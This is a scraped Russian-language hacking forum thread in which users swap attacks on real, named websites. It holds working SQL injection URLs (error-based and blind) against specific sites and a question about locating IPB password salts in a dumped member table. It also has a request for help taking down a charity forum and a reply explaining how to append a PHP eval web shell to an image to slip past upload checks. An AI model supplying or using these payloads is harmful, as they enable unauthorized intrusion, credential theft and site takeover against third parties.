http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5 а вот так не прокатило http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+
Code: http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5 Вот так и крути. Оффтоп: цитировать предыдущее сообщение не нужно
Где IPB 3+ хранит соль? И какой алгаритм шифровки искользуется? Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ? Columns: Table ibf_members name mgroup email joined ip_address posts title allow_admin_mails time_offset hide_email email_pm email_full skin warn_level warn_lastwarn language last_post restrict_post view_sigs view_img view_avs view_pop bday_day bday_month bday_year new_msg msg_total show_popup misc last_visit last_activity dst_in_use view_prefs coppa_user mod_posts auto_track orig_name lastnamechange namehistory org_perm_id temp_ban sub_end login_anonymous ignored_users mgroup_others member_login_key member_login_key_expire subs_pkg_chosen has_blog members_auto_dst members_cache members_disable_pm members_display_name members_created_remote members_editor_choice members_markers members_profile_views members_l_display_name members_l_username failed_logins failed_login_count has_gallery gallery_perms t23_pcr_time ip_geo
Вот это нашел только, хз то или нет) 2 Dare http://www.lstc.edu/intranet/ 2 Bramin http://www.elixirherbals.com:2082/
PHP: http://lstcnet.lstc.edu/ics Вот это не подойдет? А вообще ты глянь из какой ты базы данных хочешь пароли-явки взять.
Парни, всем привет. В общем не мое это дело, ломать форумы, я обычный программист, но стала такая ситуация очень нужной, а разобраться до самого последнего конца не могу. Есть форум: _forum.help-animal. org.ua Настоящая организация уже давно уехала с форума, делает себе новый сайт, а владелец этого форума еще пишет от ихнего имени. Цель: Сделать сайт недоступным для общества. Я так понял, форум вообще не защищен, так как устанавливали люди, которые в этом деле не совсем разбираются. Я понимаю, что никто на блюдечке мне не принесет пароль администратора, по этому прошу хотя-бы подсказать путь, в каком направлении мне двигаться. Буду раз за помощь. В данной ситуации я смог только увидеть chenlog.html, установить Perl и начать запускать готовые pl скрипты, но дальше тупик. Понять суть заливания шелов тоже не могу, подмена печенек в этой версии форума, как я понял невозможна, за sql "прививки" вообще молчу . Так-что я продвинулся не так далеко, как бы хотел.
есть админка..заливаю .php шелл не заливается.. долjна бить .jpg или .gif// пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800.. а как обходит ето ? и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//
Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например PHP: <?php eval(stripslashes($_REQUEST[c]));?> И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.
blind sql Всем привет! Кручу blind вида(в поле ввода мыла): Code: [email protected]' and (select if((select user from mysql.user limit 1)='root',1,0))='1 У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу. Ну т.е. я хочу в таблицу с новостями добавить php-код. Прокатит ли такое?
